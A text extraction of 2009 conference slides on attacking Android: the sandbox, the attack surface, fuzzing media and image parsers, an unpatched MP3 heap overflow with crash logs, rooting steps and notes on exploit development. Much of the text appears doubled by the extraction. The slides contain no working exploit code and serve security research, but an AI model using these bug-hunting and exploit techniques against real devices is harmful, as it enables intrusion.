Pulling a John Connor: Defeating Android
64
Pulling a John Pulling a John Connor: Connor: Defeating Android Defeating Android Charlie Miller Charlie Miller Independent Security Evaluators Independent Security Evaluators [email protected] [email protected]
description
Pulling a John Connor: Defeating Android. Charlie Miller Independent Security Evaluators [email protected]. About me. Former National Security Agency First to hack the iPhone and Android G1 phone Won MacBook Air at Pwn2Own competition with Safari 0-day - PowerPoint PPT Presentation
Transcript of Pulling a John Connor: Defeating Android
Pulling a John Connor:Pulling a John Connor:Defeating AndroidDefeating Android
Charlie MillerCharlie MillerIndependent Security EvaluatorsIndependent Security Evaluators
[email protected]@securityevaluators.com
About meAbout me
Former National Security AgencyFormer National Security Agency
First to hack the iPhone and Android G1 phoneFirst to hack the iPhone and Android G1 phone
Won MacBook Air at Pwn2Own competition with Won MacBook Air at Pwn2Own competition with Safari 0-daySafari 0-day
Author of “Fuzzing for Software Security Testing and Author of “Fuzzing for Software Security Testing and Quality Assurance”Quality Assurance”
Author of “The Mac Hackers Handbook”Author of “The Mac Hackers Handbook”
Due out in a few weeksDue out in a few weeks
OutlineOutline
Phone hackingPhone hacking
Android security modelAndroid security model
Attack surfaceAttack surface
Bug huntingBug hunting
Exploit devExploit dev
After access is achievedAfter access is achieved
Smart phone hacking is Smart phone hacking is fun!fun!
Small but capable computersSmall but capable computers
Always onAlways on
Always connected to the Internet (Wi-Fi, EDGE, Always connected to the Internet (Wi-Fi, EDGE, 3G)3G)
Cellular capabilitiesCellular capabilities
Personal informationPersonal informationContactsContacts
VoicemailVoicemail
Pictures and moviesPictures and movies
Web credentials and cookiesWeb credentials and cookies
Email and text messagesEmail and text messages
Calendar and eventsCalendar and events
GPS informationGPS information
Good hacker assetGood hacker asset
““Smart phone DOS”Smart phone DOS”
Instant financial gainInstant financial gain
1-900 numbers, text messages, etc1-900 numbers, text messages, etc
GPS (contrast with random compromised box on GPS (contrast with random compromised box on Internet)Internet)
Listening deviceListening device
Circumvent network security protectionsCircumvent network security protections
Smart phone DDOSSmart phone DDOS
Out of band Out of band communicationcommunication
Issues for defenseIssues for defense
Typically no AV on phonesTypically no AV on phones
NIDS can be avoided with SMSNIDS can be avoided with SMS
Hard to determine phone has been Hard to determine phone has been compromisedcompromised
Tricky forensicsTricky forensics
Phones go to Starbucks for a breakPhones go to Starbucks for a break
Android basicsAndroid basics
Open source, free, mobile platformOpen source, free, mobile platform
One production phone runs it, T-Mobile G1One production phone runs it, T-Mobile G1
Consists of OS, middleware, some Consists of OS, middleware, some applicationsapplications
Linux kernelLinux kernel
Webkit based browserWebkit based browser
Smart phoneSmart phone
3G / WiFi / Bluetooth3G / WiFi / Bluetooth
Web browserWeb browser
SMS/MMS messagingSMS/MMS messaging
Audio/video playerAudio/video player
AOL IM clientAOL IM client
GPS, integration with google maps...GPS, integration with google maps...
etcetc
Security ArchitectureSecurity Architecture
Linux - traditional user idLinux - traditional user id
Fine grained access controlsFine grained access controls
Linux based controlsLinux based controls
Each application gets its own UID (unless Each application gets its own UID (unless specifically shared)specifically shared)
Application data is stored such that it is user Application data is stored such that it is user readable/writable only (unless specifically shared)readable/writable only (unless specifically shared)
# ps# ps......radioradio 81 23 101936 19552 ffffffff afe0c534 S com.android.phone 81 23 101936 19552 ffffffff afe0c534 S com.android.phoneapp_4app_4 85 23 98352 19120 ffffffff afe0c534 S android.process.acore85 23 98352 19120 ffffffff afe0c534 S android.process.acoreapp_8app_8 106 106 23 93732 14564 ffffffff afe0c534 S com.google.process.gapps 23 93732 14564 ffffffff afe0c534 S com.google.process.gappsapp_11app_11 119 119 23 100048 14992 ffffffff afe0c534 S com.android.mms23 100048 14992 ffffffff afe0c534 S com.android.mmsapp_0app_0 131 23 131 23 90540 14232 ffffffff afe0c534 S com.android.alarmclock90540 14232 ffffffff afe0c534 S com.android.alarmclockapp_3app_3 139 23 139 23 91668 15076 ffffffff afe0c534 S android.process.media91668 15076 ffffffff afe0c534 S android.process.mediaapp_1app_1 164 23 164 23 117732 25984 ffffffff afe0b23c R com.android.browser117732 25984 ffffffff afe0b23c R com.android.browserapp_18app_18 308 23 93496 308 23 93496 16016 ffffffff afe0c534 S net.gimite.nativeexe16016 ffffffff afe0c534 S net.gimite.nativeexeapp_19app_19 701 23 91388 14448 701 23 91388 14448 ffffffff afe0c534 S charlie.mygpsffffffff afe0c534 S charlie.mygpsmediamedia 4908 1 17280 4064 ffffffff 4908 1 17280 4064 ffffffff afe0b45c S /system/bin/mediaserverafe0b45c S /system/bin/mediaserver
Access controlsAccess controls
Applications have install-time permissions Applications have install-time permissions associated with themassociated with them
User is informed what permissions it will User is informed what permissions it will require and may accept or rejectrequire and may accept or reject
““pm list permissions” pm list permissions”
Otherwise SecurityException is (typically) Otherwise SecurityException is (typically) thrownthrown
Browser permissionsBrowser permissions
$ ./adb pull /system/app/Browser.apk .$ ./adb pull /system/app/Browser.apk .$ ./aapt dump xmltree Browser.apk AndroidManifest.xml | $ ./aapt dump xmltree Browser.apk AndroidManifest.xml | grep 'permission\.' | cut -f2 -grep 'permission\.' | cut -f2 -d\"com.google.android.googleapps.permission.d\"com.google.android.googleapps.permission.GOOGLE_AUTHGOOGLE_AUTHandroid.permission.android.permission.ACCESS_COARSE_LOCATIONACCESS_COARSE_LOCATIONandroid.permisandroid.permission.sion.ACCESS_DOWNLOAD_MANAGERACCESS_DOWNLOAD_MANAGERandroid.permission.android.permission.ACCESACCESS_FINE_LOCATIONS_FINE_LOCATIONandroid.permission.android.permission.ACCESS_NETWORK_STATEACCESS_NETWORK_STATEandroid.permission.android.permission.ACCESS_WIFI_STATEACCESS_WIFI_STATEcom.android.launchercom.android.launcher.permission..permission.INSTALL_SHORTCUTINSTALL_SHORTCUTandroid.permission.android.permission.INTERNETINTERNETandroid.permission.android.permission.WAKE_LOCKWAKE_LOCK
Permissions in actionPermissions in action
iduid=10001(app_1) gid=10001(app_1) groups=3003(inet)iduid=10001(app_1) gid=10001(app_1) groups=3003(inet)
ls /dataopendir failed, Permission deniedls /dataopendir failed, Permission deniedls ls /data/data/com.android.providers.telephony/databases/opendir /data/data/com.android.providers.telephony/databases/opendir failed, Permission deniedfailed, Permission denied
logcatUnable to open log device '/dev/log/main': Permission logcatUnable to open log device '/dev/log/main': Permission denieddenied
After browser exploitAfter browser exploit
Application Application DevelopmentDevelopment
SDK with emulator freely availableSDK with emulator freely available
All development done in All development done in JavaJava
Only signed .apk (Java apps) may be runOnly signed .apk (Java apps) may be run
May use self-signed certificateMay use self-signed certificate
Apps may run in the backgroundApps may run in the background
C and AndroidC and Android
Can write C/C++ apps with a gcc ARM cross-compilerCan write C/C++ apps with a gcc ARM cross-compiler
Some issues with non-standard libc (bionic)Some issues with non-standard libc (bionic)
Can’t do this in a Google supported wayCan’t do this in a Google supported way
Debugging sucks, SDK “debugger” is a Java debuggerDebugging sucks, SDK “debugger” is a Java debugger
$ ./arm-2007q3/bin/arm-none-linux-gnueabi-gcc $ ./arm-2007q3/bin/arm-none-linux-gnueabi-gcc -static-static -o hello hello.c $ -o hello hello.c $ file hello hello: ELF 32-bit LSB executable, ARM, version 1 (SYSV), for file hello hello: ELF 32-bit LSB executable, ARM, version 1 (SYSV), for GNU/Linux 2.6.14, statically linked, for GNU/Linux 2.6.14, not strippedGNU/Linux 2.6.14, statically linked, for GNU/Linux 2.6.14, not stripped
# chmod 700 /data/busybox/hello# /data/busybox/helloHello world# chmod 700 /data/busybox/hello# /data/busybox/helloHello world
Dynamically linking is Dynamically linking is harderharder
Download and build android source code Download and build android source code (including bionic)(including bionic)
Use the prebuilt toolchain (for Linux or Mac OS X) Use the prebuilt toolchain (for Linux or Mac OS X)
Use “agcc” wrapper to set all the flags you need Use “agcc” wrapper to set all the flags you need
Get it from: Get it from: http://plausible.org/andy/agcchttp://plausible.org/andy/agcc
$ ./arm-2007q3/bin/arm-none-linux-gnueabi-gcc -o hello hello.c $ ./arm-2007q3/bin/arm-none-linux-gnueabi-gcc -o hello hello.c # /data/busybox/hello/data/busybox/hello: not found# /data/busybox/hello/data/busybox/hello: not found
$ ./agcc.pl -o hello hello.c # /data/busybox/hello$ ./agcc.pl -o hello hello.c # /data/busybox/hellohihi
Tale of firmwaresTale of firmwaresRC19 - Original factory install (old Webkit bug)RC19 - Original factory install (old Webkit bug)
RC28 - a few people got this before RC29 rolled RC28 - a few people got this before RC29 rolled outout
RC29 - Fixed Webkit bug, had local root bugRC29 - Fixed Webkit bug, had local root bug
RC30 - No more rootRC30 - No more root
1.1/RC33 - Feature upgrade, all bugs fixed ;)1.1/RC33 - Feature upgrade, all bugs fixed ;)
RC7 - UK version of RC29RC7 - UK version of RC29
RC8 - UK version of RC30RC8 - UK version of RC30
ADP1 - Android Dev Phone 1.0 ~ RC28?ADP1 - Android Dev Phone 1.0 ~ RC28?
FlashingFlashing
Download firmwareDownload firmware
https://android.clients.google.com/updates/signed-kila-ota-115247-https://android.clients.google.com/updates/signed-kila-ota-115247-prereq.TC4-RC19+RC28.zipprereq.TC4-RC19+RC28.zip
https://android.clients.google.com/updates/signed-RC30-from-RC29-https://android.clients.google.com/updates/signed-RC30-from-RC29-fat.1582cace.zipfat.1582cace.zip
Put firmware on SD card as update.zipPut firmware on SD card as update.zip
Hold Home+End keys to enter system recoveryHold Home+End keys to enter system recovery
Alt-S to start installing firmwareAlt-S to start installing firmware
http://forum.xda-developers.com/showthread.php?t=466455http://forum.xda-developers.com/showthread.php?t=466455
Found by DarkRift (January 2009)Found by DarkRift (January 2009)
Rooting your own phoneRooting your own phone
Flash the phone with RC29Flash the phone with RC29
Exploit local privilege escalation bugExploit local privilege escalation bug
init.rc:init.rc:
Upgrade to modified latest firmwareUpgrade to modified latest firmware
See: See: http://android-dls.com/wiki/index.phphttp://android-dls.com/wiki/index.php for for detailsdetails
service console /system/bin/shconsoleservice console /system/bin/shconsole
Attack surfaceAttack surface
Server sideServer side
Client sideClient side
Server sideServer side
Bluetooth, wireless, network stack, etcBluetooth, wireless, network stack, etc
Nothing listening on TCP/UDP :(Nothing listening on TCP/UDP :(
Sometimes you’ll see port 5555 - Android Sometimes you’ll see port 5555 - Android Debug Bridge (adb)Debug Bridge (adb)
# /data/busybox/netstat -anActive Internet connections (servers and # /data/busybox/netstat -anActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address established)Proto Recv-Q Send-Q Local Address Foreign Address Statetcp 0 0 127.0.0.1:5037 0.0.0.0:* LISTEN Statetcp 0 0 127.0.0.1:5037 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:5555 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:5555 0.0.0.0:* LISTEN tcp 0 0 10.0.2.15:5555 10.0.2.2:50587 ESTABLISHED tcp 0 0 10.0.2.15:5555 10.0.2.2:50587 ESTABLISHED
Client side - much nicerClient side - much nicer
Web browserWeb browser
Email clientEmail client
IM clientIM client
SMS/MMSSMS/MMS
Multimedia playerMultimedia player
Android Market appsAndroid Market apps
etcetc
Java - safety?Java - safety?
In theory these are all Java applications - and In theory these are all Java applications - and thus should be immune to memory corruptionthus should be immune to memory corruption
However the JVM is built on top of many C/C++ However the JVM is built on top of many C/C++ librarieslibraries
Some API functions pass data to C/C++ Some API functions pass data to C/C++ daemons for processingdaemons for processing
Android librariesAndroid libraries
Bionic - custom libc implementationBionic - custom libc implementation
openCore - multimedia functionalityopenCore - multimedia functionality
SGL - image renderingSGL - image rendering
WebKit - HTML, JS renderingWebKit - HTML, JS rendering
All this is open source and C/C++All this is open source and C/C++
Bug huntingBug hunting
Static analysisStatic analysis
Dynamic analysisDynamic analysis
Static AnalysisStatic Analysis
Source code freely availableSource code freely available
http://source.android.com/downloadhttp://source.android.com/download
Can build, read, run through tools, etcCan build, read, run through tools, etc
Browser File FormatsBrowser File Formats
libsgl code is interesting (and buggy)libsgl code is interesting (and buggy)
From From external/skia/libsgl/ports/SkImageDecoder_Factorexternal/skia/libsgl/ports/SkImageDecoder_Factory.cppy.cpp
static const CodecFormat gPairs[] = static const CodecFormat gPairs[] = { { SkImageDecoder_GIF_Factory, SkImageDecoder::kGIF_Format }, { { SkImageDecoder_GIF_Factory, SkImageDecoder::kGIF_Format }, { SkImageDecoder_PNG_Factory, SkImageDecoder::kPNG_Format }, { SkImageDecoder_PNG_Factory, SkImageDecoder::kPNG_Format }, { SkImageDecoder_ICO_Factory, SkImageDecoder::kICO_Format }, { SkImageDecoder_ICO_Factory, SkImageDecoder::kICO_Format }, { SkImageDecoder_WBMP_Factory, SkImageDecoder::kWBMP_Format }, { SkImageDecoder_WBMP_Factory, SkImageDecoder::kWBMP_Format }, { SkImageDecoder_BMP_Factory, SkImageDecoder::kBMP_Format }, { { SkImageDecoder_BMP_Factory, SkImageDecoder::kBMP_Format }, { SkImageDecoder_JPEG_Factory, SkImageDecoder::kJPEG_Format }};SkImageDecoder_JPEG_Factory, SkImageDecoder::kJPEG_Format }};
Read the sourceRead the source
Here is an indication of the code qualityHere is an indication of the code quality
from from external/skia/libsgl/images/SkImageDecoder_libico.cpexternal/skia/libsgl/images/SkImageDecoder_libico.cppp
bool SkICOImageDecoder::onDecode(SkStream* stream, SkBitmap* bm, bool SkICOImageDecoder::onDecode(SkStream* stream, SkBitmap* bm, SkBitmap::Config pref, Mode mode)... SkBitmap::Config pref, Mode mode)... if (stream->read((void*)buf, length) != length) { return if (stream->read((void*)buf, length) != length) { return false; }...false; }... int int offsetoffset = read4Bytes(buf, 18 + i*16); int = read4Bytes(buf, 18 + i*16); int bitCount = bitCount = read2Bytesread2Bytes(buf, (buf, offsetoffset+14);+14);
FuzzingFuzzing
The Android comes with an EmulatorThe Android comes with an Emulator
QEMU-based, ARM processor emulatedQEMU-based, ARM processor emulated
Full Android stackFull Android stack
Not updated as frequently as devicesNot updated as frequently as devices
The WebKit bug still crashes the emulatorThe WebKit bug still crashes the emulator
Can fuzz emulator or deviceCan fuzz emulator or device
EmulatorEmulator
Fuzzing the emulator is convenientFuzzing the emulator is convenient
Don’t need deviceDon’t need device
Can stick it in VMware and snapshot itCan stick it in VMware and snapshot it
Can even do exploit dev on it - to a pointCan even do exploit dev on it - to a point
If things get hosed do: ./emulator -wipe-dataIf things get hosed do: ./emulator -wipe-data
ADBADB
Android debugging bridgeAndroid debugging bridge
Allows to push files on off emulator/deviceAllows to push files on off emulator/device
Gives shell on emulator/deviceGives shell on emulator/device
Gives root on emulator, “shell” on deviceGives root on emulator, “shell” on device
Can watch system logsCan watch system logs
ADB in actionADB in action
>adb devicesList of devices attachedHT845GZ52307 device>adb devicesList of devices attachedHT845GZ52307 device
>adb shell$ iduid=2000(shell) gid=2000(shell) >adb shell$ iduid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),3003(inet)groups=1003(graphics),1004(input),1007(log),1011(adb),3003(inet)
>adb logcatD/KeyguardViewMediator( 52): >adb logcatD/KeyguardViewMediator( 52): wakeWhenReadyLocked(82)D/KeyguardViewMediator( 52): wakeWhenReadyLocked(82)D/KeyguardViewMediator( 52): handleWakeWhenReady(82)D/KeyguardViewMediator( 52): handleWakeWhenReady(82)D/KeyguardViewMediator( 52): pokeWakelock(5000)D/SurfaceFlinger( 52): Screen about to return, pokeWakelock(5000)D/SurfaceFlinger( 52): Screen about to return, flinger = 0x14f7e0D/dalvikvm( 52): GC freed 19203 objects / 913184 flinger = 0x14f7e0D/dalvikvm( 52): GC freed 19203 objects / 913184 bytes in 256msV/WifiMonitor( 52): Event [CTRL-EVENT-DRIVER-STATE bytes in 256msV/WifiMonitor( 52): Event [CTRL-EVENT-DRIVER-STATE STARTED]STARTED]
Fuzzing the browserFuzzing the browser
Fuzzing HTTP, Java Script, images, etcFuzzing HTTP, Java Script, images, etc
Can be done with JavaScript Meta-Refresh Can be done with JavaScript Meta-Refresh action action
<html><body> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"><meta <html><body> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"><meta http-equiv="refresh" content="2"> Image $test_case_number : <img http-equiv="refresh" content="2"> Image $test_case_number : <img src="/images/" . sprintf("%08d", $test_case_number) . ".src="/images/" . sprintf("%08d", $test_case_number) . ".$image_type"> </body></html>";$image_type"> </body></html>";
Watching for crashesWatching for crashes
Use logcat to watch for crashesUse logcat to watch for crashes
Examples comingExamples coming
Demo: Fuzzing .icoDemo: Fuzzing .ico
Fuzzing Music PlayerFuzzing Music Player
Fuzzing other apps requires actually launching Fuzzing other apps requires actually launching them from the command line and directing them from the command line and directing them to the fuzzed test casesthem to the fuzzed test cases
Remember the apps are Java bytecodeRemember the apps are Java bytecode
Need to launch inside the virtual machineNeed to launch inside the virtual machine
Command lineCommand line
Need Need actionaction and and componentcomponent for application for application
Get this from AndroidManifest.xml from Get this from AndroidManifest.xml from the .apk filethe .apk file
$ ./aapt dump xmltree Music.apk AndroidManifest.xml | grep 'intent.action' | sort -u A: $ ./aapt dump xmltree Music.apk AndroidManifest.xml | grep 'intent.action' | sort -u A: android:name(0x01010003)="android.intent.action.android:name(0x01010003)="android.intent.action.CREATE_SHORTCUTCREATE_SHORTCUT" (Raw: "android.intent.action.CREATE_SHORTCUT") A: " (Raw: "android.intent.action.CREATE_SHORTCUT") A: android:name(0x01010003)="android.intent.action.android:name(0x01010003)="android.intent.action.EDITEDIT" (Raw: "android.intent.action.EDIT") A: " (Raw: "android.intent.action.EDIT") A: android:name(0x01010003)="android.intent.action.android:name(0x01010003)="android.intent.action.MAINMAIN" (Raw: "android.intent.action.MAIN") A: " (Raw: "android.intent.action.MAIN") A: android:name(0x01010003)="android.intent.action.android:name(0x01010003)="android.intent.action.MEDIA_BUTTONMEDIA_BUTTON" (Raw: "android.intent.action.MEDIA_BUTTON") A: " (Raw: "android.intent.action.MEDIA_BUTTON") A: android:name(0x01010003)="android.intent.action.android:name(0x01010003)="android.intent.action.PICKPICK" (Raw: "android.intent.action.PICK") A: " (Raw: "android.intent.action.PICK") A: android:name(0x01010003)="android.intent.action.android:name(0x01010003)="android.intent.action.SEARCHSEARCH" (Raw: "android.intent.action.SEARCH") A: " (Raw: "android.intent.action.SEARCH") A: android:name(0x01010003)="android.intent.action.android:name(0x01010003)="android.intent.action.VIEWVIEW" (Raw: "android.intent.action.VIEW")" (Raw: "android.intent.action.VIEW")
$ ./aapt dump xmltree Music.apk AndroidManifest.xml | grep -B3 VIEW | grep name | grep -v VIEW $ ./aapt dump xmltree Music.apk AndroidManifest.xml | grep -B3 VIEW | grep name | grep -v VIEW A: android:name(0x01010003)="StreamStarter" (Raw: " A: android:name(0x01010003)="StreamStarter" (Raw: "StreamStarterStreamStarter")")
Launch the app!Launch the app!
#!/usr/bin/env pythonimport sys, os, time, subprocessadb="~/android/android-sdk-mac_x86-1.0_r2/tools/adb"logdump=[adb,"logcat","-d"]cmd=[adb,"shell","am","start","-a","android.intent.action.VIEW","-n","com.android.music/com.android.music.StreamStarter",sys.argv[2]]# Clear system logos.system(adb + " logcat -c")log=""cmdout = subprocess.Popen(cmd, stdout=subprocess.PIPE).stdoutstart=0testtime=int(sys.argv[1])/1000.0while(time.time()-start < testtime or start == 0): log= subprocess.Popen(logdump, stdout=subprocess.PIPE).communicate()[0] if(start==0): start=time.time() time.sleep(1)print log
Demo: Fuzzing Music Demo: Fuzzing Music
An exploitable bug in An exploitable bug in RC33RC33
Notified Google on Jan 21, 2009Notified Google on Jan 21, 2009
17 days ago17 days ago
Still a 0-day in G1 phonesStill a 0-day in G1 phones
In libpvplayer.so (openCore)In libpvplayer.so (openCore)
In pvmp3_huffman_parsing() from In pvmp3_huffman_parsing() from pvmp3_huffman_parsing.cpppvmp3_huffman_parsing.cpp
The bugThe bug
......for (i = 0; (uint32)i < (grInfo->big_values << 1); for (i = 0; (uint32)i < (grInfo->big_values << 1); i += i += 22)... grBits = part2_start + )... grBits = part2_start + grInfo-grInfo->part2_3_length>part2_3_length; while ((pMainData->usedBits < grBits) ; while ((pMainData->usedBits < grBits) && (i < FILTERBANK_BANDS*SUBBANDS_NUMBER - && (i < FILTERBANK_BANDS*SUBBANDS_NUMBER - 4)) { pvmp3_huffman_quad_decoding(h, &is[i], 4)) { pvmp3_huffman_quad_decoding(h, &is[i], pMainData); i += 4; } if ((pMainData->usedBits < pMainData); i += 4; } if ((pMainData->usedBits < grBits) && (i < grBits) && (i < FILTERBANK_BANDS*SUBBANDS_NUMBER)) { FILTERBANK_BANDS*SUBBANDS_NUMBER)) { pvmp3_huffmanpvmp3_huffman_quad_decoding_quad_decoding(h, &is[i], pMainData); i += 4;...(h, &is[i], pMainData); i += 4;...
The bug (cont)The bug (cont)
isis is a uint array of size is a uint array of size FILTERBANK_BANDS*SUBBANDS_NUMBERFILTERBANK_BANDS*SUBBANDS_NUMBER
pvmp3_huffman_quad_decoding writes dwords pvmp3_huffman_quad_decoding writes dwords to to is[i], is[i+1], is[i+2], is[i+3]is[i], is[i+1], is[i+2], is[i+3]
grinfo->part2_3_lengthgrinfo->part2_3_length is controllable is controllable
Get 2 dword overflowGet 2 dword overflow
Exploitable?Exploitable?
I/DEBUG ( 9113): *** *** *** *** *** *** *** *** *** *** *** *** *** *** I/DEBUG ( 9113): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***I/DEBUG ( 9113): Build fingerprint: *** ***I/DEBUG ( 9113): Build fingerprint: 'generic/generic/generic/:1.0/119366/119366:sdk/test-keys'I/DEBUG 'generic/generic/generic/:1.0/119366/119366:sdk/test-keys'I/DEBUG ( 9113): pid: 9221, tid: 9226 >>> /system/bin/mediaserver <<<I/DEBUG ( 9113): pid: 9221, tid: 9226 >>> /system/bin/mediaserver <<<I/DEBUG ( 9113): signal 11 (SIGSEGV), fault addr ( 9113): signal 11 (SIGSEGV), fault addr e80e3cd0e80e3cd0I/DEBUG ( 9113): r0 I/DEBUG ( 9113): r0 00000081 r1 00000003 r2 afe38678 r3 00043460I/DEBUG ( 9113): r4 00000081 r1 00000003 r2 afe38678 r3 00043460I/DEBUG ( 9113): r4 e80e3cc4e80e3cc4 r5 00000001 r6 00000018 r7 afe3863cI/DEBUG ( 9113): r8 r5 00000001 r6 00000018 r7 afe3863cI/DEBUG ( 9113): r8 40207cfc r9 afe35a88 10 a9d26e8d fp 00000001I/DEBUG ( 9113): ip 40207cfc r9 afe35a88 10 a9d26e8d fp 00000001I/DEBUG ( 9113): ip afd010b0 sp 40307cc8 lr afe0da58 pc afd010b0 sp 40307cc8 lr afe0da58 pc afe0a4e6afe0a4e6 cpsr 80000030I/DEBUG cpsr 80000030I/DEBUG ( 9113): #00 pc afe0a4e6 /system/lib/libc.soI/DEBUG ( 9113): ( 9113): #00 pc afe0a4e6 /system/lib/libc.soI/DEBUG ( 9113): #01 pc afd0095e /system/lib/libstdc++.soI/DEBUG ( 9113): #01 pc afd0095e /system/lib/libstdc++.soI/DEBUG ( 9113): #02 pc a7172aca /system/lib/libpvplayer.so #02 pc a7172aca /system/lib/libpvplayer.so
Fuzzed mp3, crash in Fuzzed mp3, crash in mediaservermediaserver
Crashes while checking safe Crashes while checking safe unlinkunlink
Corrupt heap meta-dataCorrupt heap meta-data
Fuzzing greatest hitsFuzzing greatest hits
I/DEBUG (15993): *** *** *** *** *** *** *** *** *** *** *** *** *** *** I/DEBUG (15993): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***I/ActivityManager( 51): Displayed activity *** ***I/ActivityManager( 51): Displayed activity com.android.music/.StreamStarter: 2173 msI/DEBUG (15993): Build com.android.music/.StreamStarter: 2173 msI/DEBUG (15993): Build fingerprint: fingerprint: 'generic/generic/generic/:1.0/119366/119366:sdk/test-keys'I/DEBUG 'generic/generic/generic/:1.0/119366/119366:sdk/test-keys'I/DEBUG (15993): pid: 15994, tid: 16021 >>> /system/bin/mediaserver <<<I/DEBUG (15993): pid: 15994, tid: 16021 >>> /system/bin/mediaserver <<<I/DEBUG (15993): signal 11 (SIGSEGV), fault addr (15993): signal 11 (SIGSEGV), fault addr fffd10e6fffd10e6I/DEBUG (15993): r0 I/DEBUG (15993): r0 00000087 r1 0003ac6c r2 0000021c r3 00000000I/DEBUG (15993): r4 00000087 r1 0003ac6c r2 0000021c r3 00000000I/DEBUG (15993): r4 00030740 r5 00000000 r6 00030740 r5 00000000 r6 fffd10dafffd10da r7 0001406cI/DEBUG (15993): r8 r7 0001406cI/DEBUG (15993): r8 40207bbc r9 afe35a88 10 a9d26e8d fp 00000001I/DEBUG (15993): ip 40207bbc r9 afe35a88 10 a9d26e8d fp 00000001I/DEBUG (15993): ip a7572820 sp 40407e10 lr a7159fa1 pc a7572820 sp 40407e10 lr a7159fa1 pc a7159f68a7159f68 cpsr 40000030I/DEBUG cpsr 40000030I/DEBUG (15993): #00 pc a7159f68 /system/lib/libpvplayer.soI/DEBUG (15993): #00 pc a7159f68 /system/lib/libpvplayer.soI/DEBUG (15993): #01 pc a7159f9e /system/lib/libpvplayer.soI/DEBUG (15993): #01 pc a7159f9e /system/lib/libpvplayer.soI/DEBUG (15993): #02 pc a715dc40 /system/lib/libpvplayer.soI/DEBUG (15993): #02 pc a715dc40 /system/lib/libpvplayer.soI/DEBUG (15993): #03 pc a715d8ba /system/lib/libpvplayer.so(15993): #03 pc a715d8ba /system/lib/libpvplayer.so
fuzzed mp3, some control fuzzed mp3, some control over r6over r6
Fuzzing greatest hitsFuzzing greatest hits
r6r6 (bad - we have some control) - derefed, (bad - we have some control) - derefed, put in put in r0r0
r0r0 derefed, put into derefed, put into r3r3r3r3 derefed, put into derefed, put into r1r1
branch (jump) to branch (jump) to r1r1
Fuzzing greatest hits, Fuzzing greatest hits, FTWFTWI/DEBUG ( 20): *** *** *** *** *** *** *** *** *** *** *** *** ****** I/DEBUG ( 20): *** *** *** *** *** *** *** *** *** *** *** *** ****** *** ***I/DEBUG ( 20): Build *** ***I/DEBUG ( 20): Build fingerprint:'generic/generic/generic/:1.0/119366/119366:sdk/test-keys'I/fingerprint:'generic/generic/generic/:1.0/119366/119366:sdk/test-keys'I/DEBUG ( 20): pid: 365, tid: 365 >>> com.android.browser <<<I/DEBUG DEBUG ( 20): pid: 365, tid: 365 >>> com.android.browser <<<I/DEBUG ( 20): signal 4 ( ( 20): signal 4 (SIGILLSIGILL), fault addr 0027fe34I/DEBUG ( 20): r0 ), fault addr 0027fe34I/DEBUG ( 20): r0 0027fdd0 r1 ac125670 r2 0027fe28 r3 001fd4c8I/DEBUG ( 20): r4 0027fdd0 r1 ac125670 r2 0027fe28 r3 001fd4c8I/DEBUG ( 20): r4 0027fdd0 r5 001c8888 r6 001fd44c r7 bed8c524I/DEBUG ( 20): r8 0027fdd0 r5 001c8888 r6 001fd44c r7 bed8c524I/DEBUG ( 20): r8 001fd418 r9 4104ad1c 10 4104ad08 fp 00000000I/DEBUG ( 20): ip 001fd418 r9 4104ad1c 10 4104ad08 fp 00000000I/DEBUG ( 20): ip 001fd44c sp bed8c510 lr ac05d564 pc 001fd44c sp bed8c510 lr ac05d564 pc 0027fe380027fe38cpsr 20000010I/DEBUG cpsr 20000010I/DEBUG ( 20): #00 pc ( 20): #00 pc 0027fe38 [heap]0027fe38 [heap]I/DEBUG ( 20): #01 I/DEBUG ( 20): #01 pc ac05d560 /system/lib/libsgl.so pc ac05d560 /system/lib/libsgl.so
oops, the fuzzing testcase almost oops, the fuzzing testcase almost got control of the process by got control of the process by
accident!accident!
Exploit DevExploit Dev
From an exploit perspective, the phone runs From an exploit perspective, the phone runs Linux on ARMLinux on ARM
Bionic library uses Doug Lea mallocBionic library uses Doug Lea malloc
Can use standard shellcode (almost)Can use standard shellcode (almost)
Limited by application sandboxLimited by application sandbox
My 1st exploit timelineMy 1st exploit timeline
Early SDK’s were full of bugsEarly SDK’s were full of bugs
Pwn2Own Webkit bug was in the SDK leading Pwn2Own Webkit bug was in the SDK leading to launchto launch
October 20th - saw it was on phone too, October 20th - saw it was on phone too, reported to Googlereported to Google
October 22nd launchOctober 22nd launch
October 25th - reported in media (no details)October 25th - reported in media (no details)
November 1st, OTA update fixesNovember 1st, OTA update fixes
OTA updateOTA update
How’d I get a pre-launch How’d I get a pre-launch phone?phone?
Android exploits = Linux Android exploits = Linux exploitsexploitsA diff between the iPhone and Android versions of A diff between the iPhone and Android versions of
the exploit consists of exactlythe exploit consists of exactly
Shellcode - duhShellcode - duh
data which writes over heap metadata (see data which writes over heap metadata (see below)below)
Address of sled (in sled and in overflow)Address of sled (in sled and in overflow)
THAT’S IT!THAT’S IT!
The heap metadata that was crushed was differentThe heap metadata that was crushed was different
different libcdifferent libc
Just had to see what we needed to survive for a Just had to see what we needed to survive for a bitbit
Exploit dev and Exploit dev and emulatoremulator
My original exploit developed for the emulator My original exploit developed for the emulator worked out of the box on the real deviceworked out of the box on the real device
Some addresses may be differentSome addresses may be different
Very robust exploits will work on both, but may Very robust exploits will work on both, but may have to debug on phone, yuckhave to debug on phone, yuck
ARM basicsARM basics
RISCRISC
2 or 4 byte instructions2 or 4 byte instructions
16 registers16 registers
First arguments go in r0-r4First arguments go in r0-r4
Then stackThen stack
Syscall number goes in r7Syscall number goes in r7
